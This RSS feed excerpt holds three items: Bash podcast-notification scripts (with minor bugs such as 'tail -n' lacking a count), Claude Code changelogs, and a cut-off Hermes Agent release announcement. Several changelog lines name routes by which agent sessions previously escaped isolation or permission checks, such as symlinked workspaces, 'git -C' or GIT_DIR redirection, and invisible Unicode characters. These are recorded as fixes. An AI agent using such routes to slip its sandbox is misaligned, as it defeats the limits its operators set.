	result=$?</p>

<p>

</p>

<p>

</p>

<p>
	# Check if exited due to new podcast, or if some error.</p>

<p>
	if (( result == 0 )); then</p>

<p>
		# Success, signal new podcast.</p>

<p>
		notify-send "New HPR podcast available."</p>

<p>
	else</p>

<p>
		# Check to make sure the directory exists.</p>

<p>
		# If it doesn't exist, there isn't much we can do to fix it.</p>

<p>
		if [ ! -e "$poderrorspath" ]; then</p>

<p>
			notify-send "Podfetch error: Podcast directory not found $poderrorspath"</p>

<p>
			exit 1</p>

<p>
		fi</p>

<p>
	fi</p>

<p>

</p>

<p>
	# Wait a bit so that multiple new files don't keep re-triggering the notification.</p>

<p>
	sleep 60</p>

<p>

</p>

<p>
done</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>
END OF SECOND SHELL SCRIPT</p>

<p>

</p>

<p>

</p>

<p>
START OF THIRD SHELL SCRIPT</p>

<p>

</p>

<p>
podfetcherror</p>

<p>
Created Tuesday 23 June 2026</p>

<p>

</p>

<p>
#!/bin/bash</p>

<p>

</p>

<p>
# Part of Podfetch.</p>

<p>
# This monitors the Podfetch error reporting file for new errors.</p>

<p>
# This should be run as a background task.</p>

<p>
# Install it using the "Startup Applications" utility in Ubuntu.</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>
# Where the Podfetch program error report file is located.</p>

<p>
poderrorspath="/home/me/Apps/hprfetch"</p>

<p>

</p>

<p>
# The full path and file name.</p>

<p>
poderrorsreport="$poderrorspath/poderrorsreport.txt"</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>
# Error counter.</p>

<p>
errcount=0</p>

<p>

</p>

<p>
# Wait for the poderrorsreport file to be modified.</p>

<p>
while true; do</p>

<p>

</p>

<p>
	errmsg=$( inotifywait -e modify $poderrorsreport )</p>

<p>
	result=$?</p>

<p>

</p>

<p>
	# Wait a bit to ensure that writing to the file is complete.</p>

<p>
	sleep 3</p>

<p>

</p>

<p>
	if (( result == 0 )); then</p>

<p>
		# Get the latest error message.</p>

<p>
		# Cut out the date stamp at the start of the line and take the rest.</p>

<p>
		poderr=$( tail -n $poderrorsreport | cut -d" " -f2- )</p>

<p>

</p>

<p>
		notify-send "Podfetch error: $poderr"</p>

<p>

</p>

<p>
		# Reset the error counter every time there is a successful result.</p>

<p>
		errcount=0</p>

<p>

</p>

<p>
	else</p>

<p>
		# Check to make sure the directory exists.</p>

<p>
		if [ ! -e "$poderrorspath" ]; then</p>

<p>
			notify-send "Podfetch error: error report path not found $poderrorspath"</p>

<p>
			exit 1</p>

<p>
		fi</p>

<p>

</p>

<p>
		# Check if the file we are trying to monitor exists.</p>

<p>
		# If not, then create an empty file for error signaling.</p>

<p>
		if [ ! -e "$poderrorsreport" ]; then</p>

<p>
			echo &gt; $poderrorsreport</p>

<p>
		fi</p>

<p>

</p>

<p>
		# Increment the error counter.</p>

<p>
		count=$(( count + 1 ))</p>

<p>
		if (( count &gt; 3 )); then</p>

<p>
			notify-send "Podfetch error: Excessive unknown errors, exiting."</p>

<p>
			exit 1</p>

<p>
		fi</p>

<p>

</p>

<p>
	fi</p>

<p>

</p>

<p>
done</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>

</p>


<p><a href="https://hackerpublicradio.org/eps/hpr4688/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.1.217]]></title>
<description><![CDATA[What's changed

Added emoji shortcode autocomplete in the prompt input: type :heart: to insert ❤️, or :hea for suggestions — disable with the emojiCompletionEnabled setting
Added warnings when transcript writes are failing (e.g. disk full) or when session saving is off due to an inherited environ...]]></description>
<link>https://tsecurity.de/de/3684903/downloads/v21217/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684903/downloads/v21217/</guid>
<pubDate>Tue, 21 Jul 2026 23:48:16 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's changed</h2>
<ul>
<li>Added emoji shortcode autocomplete in the prompt input: type <code>:heart:</code> to insert ❤️, or <code>:hea</code> for suggestions — disable with the <code>emojiCompletionEnabled</code> setting</li>
<li>Added warnings when transcript writes are failing (e.g. disk full) or when session saving is off due to an inherited environment variable, instead of losing transcripts silently</li>
<li>Fixed a memory leak where truncated MCP tool outputs kept the full untruncated result in memory for the rest of the session</li>
<li>Fixed Windows auto-update failures that could leave <code>claude.exe</code> missing; failed updates now restore the preserved executable automatically</li>
<li>Fixed background session isolation not canonicalizing symlinked working directories, which could let sessions escape their workspace folder</li>
<li>Fixed auto-compact never triggering for Claude Opus 4.8 on Bedrock and <code>/compact</code> failing once over the limit</li>
<li>Fixed corporate mTLS, TLS-verify, OAuth scope, and proxy settings being ignored in Claude Desktop sessions</li>
<li>Fixed screen reader mode's startup announcement being cut off by the first prompt render, and the thinking status row re-rendering every few seconds to update elapsed time and token counts</li>
<li>Fixed managed settings that set <code>OTEL_EXPORTER_OTLP_ENDPOINT</code> not governing all signals — lower-scope signal-specific overrides no longer redirect telemetry away from the managed endpoint</li>
<li>Fixed <code>--resume</code>/<code>--continue</code> and <code>/resume</code> failing with a TypeError when a transcript has a malformed attachment entry</li>
<li>Fixed Remote Control sessions not showing a pending permission prompt or dialog to viewers that connected after it appeared</li>
<li>Fixed background shells sometimes becoming impossible to stop after a session is sent to the background (<code>/background</code> or <code>←</code>) or when the session exits on a heavily loaded machine, most visible on Windows</li>
<li>Fixed a <code>CLAUDE.md</code> or <code>SKILL.md</code> paths frontmatter value with many brace groups OOM-killing or stalling the CLI at startup — brace expansion is now budget-bounded</li>
<li>Fixed the transcript preview sitting flush against the input area when attaching to a starting background session; it now leaves the same one-line gap as the live layout, so the transcript no longer shifts when the session takes over</li>
<li>Improved footer PR badge links to be clickable hyperlinks even when terminal support can't be detected (e.g. over ssh/tmux); set <code>FORCE_HYPERLINK=0</code> to opt out</li>
<li>Changed the login-expiry warning to appear 3 days before expiry instead of 5</li>
<li>Capped the frontend-design plugin suggestion tip at 3 lifetime impressions instead of repeating indefinitely</li>
<li>Added a cap on concurrently-running subagents (default 20, override with <code>CLAUDE_CODE_MAX_CONCURRENT_SUBAGENTS</code>) so one message can't fan out unbounded background agents</li>
<li>Changed subagents to no longer spawn nested subagents by default; set <code>CLAUDE_CODE_MAX_SUBAGENT_SPAWN_DEPTH</code> to allow deeper nesting</li>
<li>Fixed <code>--max-budget-usd</code> not stopping background subagents: once the cap is reached, new spawns are denied and running background agents are halted</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.1.216]]></title>
<description><![CDATA[What's changed

Added sandbox.filesystem.disabled setting to skip filesystem isolation while keeping network egress control
Fixed a slowdown in long sessions where message normalization cost grew quadratically with the number of turns, causing multi-second stalls and slow resumes
Fixed auto mode ...]]></description>
<link>https://tsecurity.de/de/3682279/downloads/v21216/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682279/downloads/v21216/</guid>
<pubDate>Tue, 21 Jul 2026 00:16:52 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's changed</h2>
<ul>
<li>Added <code>sandbox.filesystem.disabled</code> setting to skip filesystem isolation while keeping network egress control</li>
<li>Fixed a slowdown in long sessions where message normalization cost grew quadratically with the number of turns, causing multi-second stalls and slow resumes</li>
<li>Fixed auto mode denying commands with "HTTP 401" classifier errors after the OAuth token expired or rotated mid-session</li>
<li>Fixed AskUserQuestion telling Claude to continue even when your answer asked it to wait or explain first — free-text answers now get neutral wording</li>
<li>Fixed Claude Code on the web re-asking the same question and dropping your answer after the session sat idle for a few minutes</li>
<li>Fixed @-mentions silently attaching nothing after file-modifying hooks, vim dot-repeat of <code>c</code>-operators and paste, statusline running twice on resume, and resume-picker hangs on failure</li>
<li>Fixed resumed background agent sessions reverting to the default agent: the agent's prompt and tool restrictions are now restored</li>
<li>Fixed worktree-isolated subagents redirecting git into the shared checkout via <code>git -C</code>, <code>--git-dir</code>, or <code>GIT_DIR</code>/<code>GIT_WORK_TREE</code></li>
<li>Fixed worktree sessions landing in another project's leftover worktree when the working directory did not match the selected project</li>
<li>Fixed background sessions whose worktree has no git repository being undeletable</li>
<li>Fixed <code>claude daemon stop --any</code> potentially terminating an unrelated process via a stale legacy daemon lockfile</li>
<li>Fixed Esc-Esc at an idle prompt not opening the rewind picker in long-running sessions with background tasks</li>
<li>Fixed Bash command permission checking for compound statements with redirects inside <code>&amp;&amp;</code> lists or negations</li>
<li>Fixed pressing Ctrl+X twice in the agent list failing to delete a session, and deleted sessions reappearing when their background worker had died</li>
<li>Fixed background subagents getting cancelled when a high-priority message arrives during their startup window</li>
<li>Fixed mouse and focus garbage in the terminal while a GUI editor from <code>/memory</code>, <code>/plan</code>, <code>/keybindings</code>, or Ctrl+G is open; <code>/memory</code> no longer waits for the editor to close</li>
<li>Fixed Claude-in-Chrome 403-looping on reconnect when the session's OAuth token lacks a required scope</li>
<li>Fixed workflow saves and scheduled-task writes following a symlink at <code>.claude</code>, which could redirect writes outside the project</li>
<li>Fixed MCP re-authenticate revoking working credentials before the new sign-in succeeds, and the reconnect needs-auth message in background sessions pointing at an unusable command</li>
<li>Fixed read-only commands on Windows accessing network paths without a permission prompt</li>
<li>Fixed Bash command parsing of non-ASCII characters to match real shell word boundaries</li>
<li>Fixed PowerShell tool permission validation of commands containing invisible Unicode characters</li>
<li>Fixed dialogs in fullscreen mode stretching past the right-hand edge of their panel</li>
<li>Fixed the <code>/config</code> settings list in fullscreen mode clipping its keyboard-hint footer</li>
<li>Fixed the transcript-mode (Ctrl+O) footer hint wrapping on terminals narrower than 104 columns</li>
<li>Fixed the Prometheus metrics endpoint (<code>OTEL_METRICS_EXPORTER=prometheus</code>) emitting invalid <code># UNIT</code> lines</li>
<li>Fixed skills and commands changed during a session not appearing in the slash menu until restart</li>
<li>Fixed plugin skills with a <code>name</code> frontmatter field losing their plugin prefix in slash-command autocomplete</li>
<li>Fixed telemetry misreporting permission denials: failed permission-prompt requests no longer count as user rejections, and user interrupts are now reported as user aborts instead of rejections</li>
<li>Improved the <code>/fork</code> confirmation to one line with the new session's name, <code>claude attach</code> id, and a note when the copy shares your checkout</li>
<li>Improved validation of <code>git</code> and <code>gh</code> command arguments in the PowerShell tool</li>
<li>Improved the <code>/ultrareview</code> diff-too-large error to show configured limits, measured diff size, and largest contributing files</li>
<li>Improved <code>/code-review ultra</code> empty-diff message to name the exact base ref and suggest passing an explicit base</li>
<li>Improved the spend limit adjustment prompt to show the server's reason when a spend limit change is rejected</li>
<li><code>/context</code> now shows an explicit warning when the conversation exceeds the context window, and a failed <code>/compact</code> displays as an error</li>
<li><code>/rewind</code> no longer restores or deletes files through symlinks or hard links at tracked paths and reports how many paths it skipped</li>
<li>Background sessions: <code>/mcp</code> and <code>/install-github-app</code> now park a "needs input" request in the agent view when no client is attached</li>
<li>Updated the bundled dataviz skill: reordered the default chart palette and fixed guidance that suggested direct labels for four-series charts</li>
<li>[VSCode] Fixed right-to-left text (Arabic, Hebrew, Persian) rendering in the wrong order when mixed with English or code</li>
<li>Fixed cloud sessions dropping the in-flight message when the session's container restarts mid-turn — the interrupted turn now re-runs on resume instead of leaving the session unresponsive</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hermes Agent v0.19.0 (2026.7.20) — The Quicksilver Release]]></title>
<description><![CDATA[Hermes Agent v0.19.0 (v2026.7.20)
Release Date: July 20, 2026
Since v0.18.0: ~2,245 commits · ~1,065 merged PRs · ~2,465 files changed · ~300,000 insertions · ~36,000 deletions · ~3,300 issues closed · 450+ community contributors

The Quicksilver Release. Hermes is the messenger god, and this win...]]></description>
<link>https://tsecurity.de/de/3681964/downloads/hermes-agent-v0190-2026720-the-quicksilver-release/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681964/downloads/hermes-agent-v0190-2026720-the-quicksilver-release/</guid>
<pubDate>Mon, 20 Jul 2026 20:46:40 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h1>Hermes Agent v0.19.0 (v2026.7.20)</h1>
<p><strong>Release Date:</strong> July 20, 2026<br>
<strong>Since v0.18.0:</strong> ~2,245 commits · ~1,065 merged PRs · ~2,465 files changed · ~300,000 insertions · ~36,000 deletions · <strong>~3,300 issues closed</strong> · <strong>450+ community contributors</strong></p>
<blockquote>
<p><strong>The Quicksilver Release.</strong> Hermes is the messenger god, and this window we made him move like it. First-turn time-to-first-token dropped <strong>~80% on every platform</strong>, reasoning streams live by default, the desktop app got a ~20-PR speed overhaul (14× faster streaming markdown, virtualized diffs, snappy session switching), and the TUI renders markdown incrementally. Around that speed spine: you can now <strong>manage your Nous subscription without leaving the terminal</strong>, plug <strong>Bitwarden and 1Password</strong> straight into Hermes, let <strong>smart approvals</strong> judge flagged commands for you by default, <strong>watch your subagents work live</strong>, and trust that a finished response <strong>survives a gateway crash</strong> thanks to a durable delivery ledger. This release also rolls up everything from the v0.18.1 and v0.18.2 infrastructure patch tags — those windows are fully documented here.</p>
</blockquote>
<hr>
<h2>✨ Highlights</h2>
<ul>
<li>
<p><strong>Hermes got dramatically faster — first token in a fraction of the time</strong> — Cold-start "Initializing agent..." used to eat ~4.3 seconds before your first turn even reached the model; it's now ~0.9s, an ~80% cut that applies to the CLI, gateway, TUI, desktop, and cron alike. Round 2 attacked what you <em>see</em> while waiting: reasoning models now stream their thinking live by default (no more staring at a spinner for 30 seconds), and the response box paints per token instead of per line. If Hermes ever felt like it took a deep breath before answering, that breath is gone. (<a href="https://github.com/NousResearch/hermes-agent/pull/59332" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59332/hovercard">#59332</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/59389" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59389/hovercard">#59389</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>The desktop app speed wave — 20+ targeted perf PRs</strong> — Long replies used to cost 14× more CPU in the markdown splitter than they do now; giant diffs froze the review pane until we virtualized it; switching sessions thrashes layout no more. Streaming no longer re-renders the sidebar and every tool row per token, profile backends pre-warm on hover intent, and boot-hidden panes mount at idle instead of on the cold-start critical path. The net effect: the desktop app feels like a native app under load, even with huge transcripts and busy agents. (<a href="https://github.com/NousResearch/hermes-agent/pull/67154" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67154/hovercard">#67154</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67818" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67818/hovercard">#67818</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65898" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65898/hovercard">#65898</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/66033" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66033/hovercard">#66033</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/66747" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/66747/hovercard">#66747</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/67742" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67742/hovercard">#67742</a> and more — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</p>
</li>
<li>
<p><strong>Manage your Nous plan from the terminal — <code>/subscription</code> and <code>/topup</code></strong> — Changing your subscription used to mean a trip to the billing website. Now <code>/subscription</code> opens a full flow right in the TUI or classic CLI: see your plan and remaining allowance, preview exactly what an upgrade costs ("Pay $46.30 &amp; upgrade now") or when a downgrade takes effect, and apply it — with scheduled-change banners and undo. The desktop app got a matching billing settings tab. Your wallet never has to leave the keyboard. (<a href="https://github.com/NousResearch/hermes-agent/pull/51639" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/51639/hovercard">#51639</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61054" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61054/hovercard">#61054</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61067" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61067/hovercard">#61067</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a>)</p>
</li>
<li>
<p><strong>Smart approvals are now the default</strong> — When Hermes wants to run a flagged command, an LLM reviewer now assesses it independently instead of asking you to approve every single one — and each verdict covers only that exact command, so a later command matching the same pattern gets its own review. Combined with the new <strong>user-defined deny rules</strong> (which block commands even under yolo mode) and <code>/deny &lt;reason&gt;</code> (which tells the agent <em>why</em> you refused so it course-corrects), day-to-day approval fatigue drops sharply without giving up control. (<a href="https://github.com/NousResearch/hermes-agent/pull/62661" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/62661/hovercard">#62661</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/59164" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59164/hovercard">#59164</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/54518" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/54518/hovercard">#54518</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Plug your password manager into Hermes — Bitwarden &amp; 1Password secret sources</strong> — API keys no longer have to live in a plaintext <code>.env</code>. A new pluggable <code>SecretSource</code> interface lets Hermes fetch secrets from Bitwarden and 1Password (<code>op://</code> references) at load time, with multiple vaults enabled simultaneously, deterministic precedence, conflict warnings, and per-variable provenance. This consolidated eleven competing community PRs into one orchestrated interface — future vault providers drop in as plugins. (<a href="https://github.com/NousResearch/hermes-agent/pull/59498" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59498/hovercard">#59498</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, 1Password provider salvaged from <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hwrdprkns/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hwrdprkns">@hwrdprkns</a>)</p>
</li>
<li>
<p><strong>Watch your subagents work — live transcripts + durable background delegation</strong> — <code>delegate_task</code> dispatches now return live transcript files you can <code>tail -f</code> the moment the subagents launch: every tool call, result, and streamed reply, one human-readable log per child. And background delegation completions are now <strong>durable</strong> — if the process restarts mid-run, results are restored and delivered through an ownership-checked ledger instead of vanishing. Fan out a fleet, watch any worker live, and never lose the results. (<a href="https://github.com/NousResearch/hermes-agent/pull/67479" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67479/hovercard">#67479</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/63494" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/63494/hovercard">#63494</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>A finished answer can no longer be lost — the delivery-obligation ledger</strong> — If the gateway died between generating your response and confirming the platform actually delivered it, that answer used to be silently gone (and you'd paid for the turn). Final responses are now recorded in a durable ledger in <code>state.db</code> around the platform send and <strong>redelivered on the next boot</strong> — closing a P1 silent-loss window for Telegram, Discord, Slack, and every other channel. (<a href="https://github.com/NousResearch/hermes-agent/pull/67181" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/67181/hovercard">#67181</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>One gateway, many profiles — profile-based message routing</strong> — A single multiplexed gateway sharing one bot token can now route specific guilds, channels, or threads to different profiles — each with fully isolated config, skills, memory, and secrets. Point your work Discord server at the <code>work</code> profile and your hobby server at <code>personal</code>, from one bot. A second multiplex hardening wave means one misconfigured profile can no longer take down the whole gateway. (<a href="https://github.com/NousResearch/hermes-agent/pull/64835" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64835/hovercard">#64835</a> salvaging <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Burgunthy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Burgunthy">@Burgunthy</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65700" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65700/hovercard">#65700</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60589" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60589/hovercard">#60589</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a> + six salvaged contributors)</p>
</li>
<li>
<p><strong>New providers and the newest frontier models</strong> — Fireworks AI and DeepInfra land as first-class providers (Fireworks with cost estimation and a <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3370551446" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/2" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/2/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/2">#2</a> slot in the provider picker), Upstage Solar joins via salvage, and the model catalogs picked up <strong>GPT-5.6 (Sol/Terra/Luna + Pro variants, wired end-to-end across every route)</strong>, <strong>grok-4.5 (GA)</strong>, <strong>moonshotai/kimi-k3</strong>, <strong>claude-fable-5 / claude-sonnet-5</strong>, and GA <strong>tencent/hy3</strong> — plus LM Studio JIT model loading for local setups. (<a href="https://github.com/NousResearch/hermes-agent/pull/62593" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/62593/hovercard">#62593</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/63969" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/63969/hovercard">#63969</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/61616" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61616/hovercard">#61616</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a> completing <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rob-maron/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rob-maron">@rob-maron</a>'s <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4848372503" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/61578" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/61578/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/61578">#61578</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60887" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60887/hovercard">#60887</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65913" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65913/hovercard">#65913</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64541" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64541/hovercard">#64541</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/65472" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/65472/hovercard">#65472</a>)</p>
</li>
<li>
<p><strong>Crank the thinking to max — new reasoning effort tiers and per-model control</strong> — Reasoning effort gained <code>max</code> and <code>ultra</code> levels (GPT-5.6 and Codex's top tiers), selectable everywhere from the CLI to the desktop, with sane clamping on providers with smaller scales. You can now also pin <strong>per-model reasoning-effort overrides</strong> in config, set <strong>per-slot effort in MoA presets</strong> (your advisors think hard, your synthesizer stays fast), and per-task effort for auxiliary models. Thinking depth is now a dial, not a global switch. (<a href="https://github.com/NousResearch/hermes-agent/pull/62650" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/62650/hovercard">#62650</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64458" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64458/hovercard">#64458</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64631" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64631/hovercard">#64631</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/64597" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/64597/hovercard">#64597</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Your sessions, your data — export everything</strong> — <code>hermes sessions export</code> now writes Markdown, Quarto, HTML, prompt-only, and even Hugging Face-ready trace formats, with the full filter surface (age, workspace, platform), an opt-in <code>--redact</code> secret-scrubbing pass, and compacted-session lineage stitched into one logical export. Pair with the new prune filters and bulk archive to keep your session store tidy. Your conversation history is a real dataset now, not a black box. (<a href="https://github.com/NousResearch/hermes-agent/pull/60186" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60186/hovercard">#60186</a> salvaging <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/web3blind/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/web3blind">@web3blind</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60492" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60492/hovercard">#60492</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/60507" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/60507/hovercard">#60507</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/59327" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59327/hovercard">#59327</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>Security hardening round</strong> — This window closed a long list of credential-surface gaps: Vertex credentials scoped away from subprocess env and through profile secret scopes, media/vision/image-gen local-file reads routed through one shared credential-read guard, a webhook body-size-cap sweep across every aiohttp server, bot-token redaction in Telegram transport errors, Fireworks token prefixes added to the redactor, six P1 browser/MEDIA/.env hardening PRs salvaged in one pass, and CI hardened against untrusted-ref interpolation. (<a href="https://github.com/NousResearch/hermes-agent/pull/57660" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57660/hovercard">#57660</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/58709" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/58709/hovercard">#58709</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/59215" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/59215/hovercard">#59215</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/56582" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/56582/hovercard">#56582</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/57842" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/57842/hovercard">#57842</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/srojk34/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/srojk34">@srojk34</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jquesnelle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" 